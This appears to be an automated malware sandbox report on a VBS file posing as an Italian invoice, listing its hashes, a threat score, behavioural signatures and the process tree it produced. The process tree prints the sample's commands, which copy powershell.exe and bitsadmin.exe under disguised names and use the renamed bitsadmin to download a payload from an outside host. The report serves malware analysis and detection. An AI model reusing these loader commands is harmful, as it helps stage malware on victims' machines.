Analysis
-
max time kernel
146s -
max time network
146s -
platform
windows10_x64 -
resource
win10 -
submitted
30-06-2020 11:36
Static task
static1
Behavioral task
behavioral1
Sample
FattDiffEmessa2020 03799870369.vbs
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
FattDiffEmessa2020 03799870369.vbs
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
FattDiffEmessa2020 03799870369.vbs
-
Size
3KB
-
MD5
ba1697038db097aae963962a1fd5dd15
-
SHA1
46e3f1b7e3c93f3de52d63a1afb3b6f6c17180b8
-
SHA256
79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c
-
SHA512
d45c7b86124b760381e36eeb301c2fba631e38b3ba537187ca059238eb2692531dda9efaa0ed0806c2530794b9fcd4f70e872ff6da2984d31ea812e6e177fb64
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
WScript.exedescription pid process target process PID 3676 wrote to memory of 3236 3676 WScript.exe cmd.exe PID 3676 wrote to memory of 3236 3676 WScript.exe cmd.exe PID 3676 wrote to memory of 3812 3676 WScript.exe cmd.exe PID 3676 wrote to memory of 3812 3676 WScript.exe cmd.exe PID 3676 wrote to memory of 3804 3676 WScript.exe DrBqNtd.exe PID 3676 wrote to memory of 3804 3676 WScript.exe DrBqNtd.exe PID 3676 wrote to memory of 3804 3676 WScript.exe DrBqNtd.exe -
Executes dropped EXE 1 IoCs
Processes:
DrBqNtd.exepid process 3804 DrBqNtd.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 03799870369.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\DrBqNtd.exe2⤵
-
C:\Users\Admin\AppData\Roaming\DrBqNtd.exe"C:\Users\Admin\AppData\Roaming\DrBqNtd.exe" /transfer bHybPh /download https://ndjambo.com/jaluma/03799870369/it.gif C:\Users\Admin\AppData\Roaming\it.gif2⤵
- Executes dropped EXE